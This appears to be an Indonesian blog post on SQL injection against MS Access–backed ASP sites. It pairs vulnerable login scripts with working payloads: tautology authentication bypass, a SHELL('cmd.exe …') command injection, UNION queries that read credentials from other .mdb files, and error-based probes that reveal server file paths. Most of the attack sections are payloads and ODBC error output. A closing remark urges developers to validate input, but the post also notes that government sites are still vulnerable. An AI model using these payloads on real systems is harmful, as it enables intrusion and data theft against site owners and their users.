Access SQL Injection

Nothing new here, move along. Tidak ada yang baru sebenarnya haha tp gua mau sharing karena banyak situs yang menggunakan Ms Access sebagai databasenya terutama programer Malaysia dan Indonesia. Kenapa gua bahas ini, karena database Ms Access merupakan paling rawan dalam pencurian data. Si Hacker bisa menggunakan Sysntax SQL Error untuk mencari letak file Database Ms Access, cccc😀 kemudian Download dah.

Berikut adalah penjelasan step by step proses nya:

Peru diketahuai MS Access mempunyai System Tables sebagai berikut, dan bila tabel ini ada permisionnya hehe berarti ada kurang beruntung gak bisa akses nih file. Dan memberikan permision pada user tertentu adalah salah satu cara untuk mengamankan.
****************************************************************************
% MS Access system tables
****************************************************************************
MSysACEs
MSysObjects
MSysQueries
MSysRelationships

Ini dalah contoh script yang digunakan untuk login
****************************************************************************
% MS Access command execution, (older versions only) wek’s JADUL
****************************************************************************
[Contoh Authentifikasi Script Login]

user = request(“user”)
pass = request(“pass”)
Set Conn = Server.CreateObject(“ADODB.Connection”)
Set Rs = Server.CreateObject(“ADODB.Recordset”)
Conn.Open dsn
SQL = “SELECT * FROM users where pass='”& pass &”‘ and user='”& user & “‘”
rs.open sql,conn
if rs.eof and rs.bof then
‘ Access Denied
else
‘ Access Allowed
end if

[Auth bisa di Bypass dengan cara berikut xixixi:D, hayo siapa yang pernah bikin script ini]

user = |SHELL(“cmd.exe /c dir > c:\test.txt”)|
pass = test

****************************************************************************
% Auth Bypass, Basic yang banyak digunakan orang, tp mudah2 enggak lagi. Kasih filter dong OM..!
****************************************************************************
[Auth Page Script]

user = request(“user”)
pass = request(“pass”)
Set Conn = Server.CreateObject(“ADODB.Connection”)
Set Rs = Server.CreateObject(“ADODB.Recordset”)
Conn.Open dsn
SQL = “SELECT * FROM users where pass='”& pass &”‘ and user='”& user & “‘”
rs.open sql,conn
if rs.eof and rs.bof then
‘ Access Denied
else
‘ Access Allowed
end if

[Auth Script untuk Bypass, masih banyak lho yang kayak gini wekekek]

user = ‘ or ‘1’=’1
pass = test

****************************************************************************
% Auth Bypass, Simple
****************************************************************************
[Auth Page Script]

user = request(“user”)
pass = request(“pass”)
Set Conn = Server.CreateObject(“ADODB.Connection”)
Set Rs = Server.CreateObject(“ADODB.Recordset”)
Conn.Open dsn
SQL = “SELECT user,pass FROM users where user='”& user & “‘”
rs.open sql,conn
if rs.eof and rs.bof then
‘ Access Denied
else
if (rs(“pass”) = pass) then
‘ Access Allowed
else
‘ Access Denied
end if
end if

[Auth bisa di Bypass dengan cara berikut untuk file share]

user = ‘ union select name,password from table1 in ‘\\share\test\test.mdb
pass = password that is set in \\share\test\test.mdb

[Auth bisa di Bypass dengan Local mdbs]

user = ‘ union select ‘0test’,’0test’ from customers in
‘C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.mdb’
pass = 0test

[Union Notes]

Ingat jika menggunakan Unions, pengurutan data akan menyebabkan record pertama dikembalikan. Bingung gak penjelasannku klo bingung silahkan praktek biar dong. Oche😛

****************************************************************************
% System Path Yang tidak ditutup
****************************************************************************
[Sql String]
user = test’ union select names from msysobjects in ‘.

[ODBC Response]

Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine
cannot
open the file ‘C:\WINNT\system32′. Hehe berarti ini dibuka secara exlusiv untuk user lain atau anda perlu permission untuk melihat data di database.

****************************************************************************
% Verify File jika File Ada
****************************************************************************
[Sql String – non-existant file]
user = test’ union select name from msysobjects in ‘\proof

[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file ‘C:\proof’.

[Sql String – existant]
user = test’ union select name from msysobjects in ‘\proof.txt

[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
‘C:\proof.txt’.

****************************************************************************
% Verify Path yang Ada
****************************************************************************
[Sql String – non-existant path]
test’ union select name from msysobjects in ‘\nopath\sqlerr

[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] ‘C:\nopath\sqlerr’ is not a valid
path.
Make sure that the path name is spelled correctly and that you are
connected to the
server on which the file resides.

[Sql String – existant path]
user = test’ union select name from msysobjects in ‘\inetpub\sqlerr

[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file
‘C:\inetpub\sqlerr’.

Akhir kata jika anda mendevelop menggunakan Ms Access atau apapun juga, cek inputannya. Di atas adalah celah yang sudah lama tp perlu anda ketahui ketika surfing dibeberapa situs pemerintahan Indonesia dan Malaysia, Weks ternyata masih ada Bug ini. Waduh apalagi ketika denger klo situs permerintah dibuat dengan duit dengan jumlah Milyaran, sedih.

Thank’s to Mamat Zone

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: